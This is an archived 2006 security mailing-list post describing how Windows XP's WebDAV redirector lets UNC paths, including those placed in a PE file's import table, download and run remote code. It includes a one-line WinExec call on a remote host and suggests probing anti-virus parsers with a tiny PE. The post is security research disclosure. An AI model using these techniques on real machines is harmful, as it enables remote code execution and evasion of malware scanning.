Dailydave mailing list archives
UNC imports in PE files
From: Solar Eclipse <solareclipse () phreedom org>
Date: Tue, 7 Nov 2006 02:59:10 -0800
Hello list, Most of you probably know that the WebDAV redirector in Windows XP tries to resolve UNC paths from all applications with WebDAV requests on port 80. This means that instead of calling URLDownloadToFile("http://192.168.0.1/foo.exe") and then WinExec, you can do just WinExec("\\192.168.0.1\foo.exe") What you probably don't know is that you can use a full UNC path instead of a DLL name in the import section of a PE file. When the file is executed, the loader will try to access the imported DLL using the UNC path and the WebDAV redirector will download the DLL from the Internet. It is getting increasingly harder to draw (and defend) the boundaries between the local machine, the local network and the the Internet. Check out http://www.phreedom.org/solar/code/tinype/ for the source code of a 137 byte PE file that downloads a DLL over WebDAV and executes the payload in its DllMain function. The PE file doesn't even have to contain any code, because DllMain is executed before the entry point of the executable. The page also has detailed information about hacking the PE header and building the smallest possible PE file that can be executed on Windows. Its size is only 97 bytes. If anybody is really bored, feel free to check how many anti-virus products have PE parsers that don't handle the header of the 97 byte PE file properly and fail to unpack and scan the code in the file. Good night and good luck, Solar Eclipse
Attachment:
_bin
Description:
_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- UNC imports in PE files Solar Eclipse (Nov 07)
- Re: UNC imports in PE files Arun Koshy (Nov 07)
- Re: UNC imports in PE files Barrie Dempster (Nov 08)